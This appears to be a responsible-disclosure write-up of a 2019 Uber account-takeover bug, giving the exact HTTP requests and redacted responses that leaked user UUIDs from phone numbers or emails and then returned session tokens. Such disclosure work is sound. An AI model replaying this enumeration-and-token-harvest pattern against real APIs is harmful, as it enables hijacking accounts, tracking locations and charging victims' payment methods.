This research is published with the permission of Uber under their responsible disclosure policy. The security vulnerability detailed in this write-up was disclosed by Anand Prakash of AppSecure and was swiftly resolved by Uber's engineering team.
Security Note: This issue shares similarities with the Facebook access token leak discovered in 2018.
About Uber Security Profile
Uber is a global mobility and transportation network company headquartered in San Francisco, California. Offering services across peer-to-peer ridesharing, food delivery (Uber Eats), taxi hailing, and micromobility, Uber operates in over 700 metropolitan areas globally with a market valuation exceeding $100 billion.
Vulnerability Summary & Impact
This technical write-up covers a critical account takeover vulnerability in Uber's API platform. The flaw allowed an attacker to hijack any Uber account—including Rider, Driver/Partner, and Uber Eats accounts—by querying user UUIDs and harvesting unauthenticated access tokens returned in API responses.
By exploiting this flaw, an attacker could:
- Track real-time and historical victim location data.
- Order rides and food charged to the victim's saved payment methods.
- Access private account details (full names, email addresses, phone numbers, driver licenses).
- Gain complete account persistence across Uber mobile and web apps.
Step-by-Step Exploit Walkthrough
Step 1: Enumerating User UUID via Phone Number or Email
First, I identified two unauthenticated endpoints on partners.uber.com that leaked the internal userUuid for any user when supplied with a phone number or email address.
API Request #1 (Phone Number Lookup):
POST /p3/fleet-manager/_rpc?rpc=addDriverV2 HTTP/1.1
Host: partners.uber.com
Content-Type: application/json
{"nationalPhoneNumber":"99999xxxxx","countryCode":"1"}
Response Leaking User UUID:
{
"status": "failure",
"data": {
"code": 1009,
"message": "Driver '47d063f8–0xx5e-xxxxx-b01a-xxxx' not found"
}
}
The error string directly leaked the internal userUuid (47d063f8–0xx5e-xxxxx-b01a-xxxx) attached to the target phone number.
API Request #2 (Email Address Lookup):
POST /p3/fleet-manager/_rpc?rpc=addDriverV2 HTTP/1.1
Host: partners.uber.com
Content-Type: application/json
{"email":"victim@example.com"}
Response Leaking User UUID:
{
"status": "failure",
"data": {
"code": 1009,
"message": "Driver 'ca111b95–1111–4396-b907–83abxxx5f7371e' not found"
}
}
Step 2: Fetching the Mobile Access Token & Hijacking the Account
With the leaked userUuid in hand, I issued a request to the vulnerable endpoint /marketplace/_rpc?rpc=getConsentScreenDetails on bonjour.uber.com.
Vulnerable Uber API Request:
POST /marketplace/_rpc?rpc=getConsentScreenDetails HTTP/1.1
Host: bonjour.uber.com
Connection: close
Content-Length: 67
Accept: application/json
Origin: https://bonjour.uber.com
x-csrf-token: xxxx
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3)
Content-Type: application/json
{"language":"en","userUuid":"xxxx–776–4xxxx1bd-861a-837xxx604ce"}
Vulnerable Response Leaking Full User Session Token:
{
"status": "success",
"data": {
"getUser": {
"uuid": "cxxxxxc5f7371e",
"firstname": "Maxxxx",
"lastname": "XXXX",
"role": "PARTNER",
"email": "victim@example.com",
"token": "b8038ec4143bb4xxxxxx72d",
"driverInfo": {
"contactinfo": "999999999xx",
"driverLicense": "None"
},
"partnerInfo": {
"address": "Nxxxxxxx",
"isFleet": true
}
}
}
}
The response returned the complete user profile alongside an active mobile authentication token ("token": "b8038ec4143bb4xxxxxx72d"), allowing full takeover of the target account.
Remediation & Proof of Concept
Uber resolved the vulnerability by enforcing proper session authorization checks across all _rpc endpoints and ensuring sensitive authentication tokens are stripped from public responses.
Video Proof of Concept
Disclosure Timeline
- April 19, 2019: Vulnerability reported to Uber via HackerOne.
- April 25, 2019: Report triaged by Uber Security.
- April 26, 2019: Patch deployed and $6,500 USD bounty awarded.
- June 28, 2019: Disclosure requested.
- September 9, 2019: Public disclosure approved by Uber.
Further Reading
For additional details and background on this issue, you can check out these articles:
No comments:
Post a Comment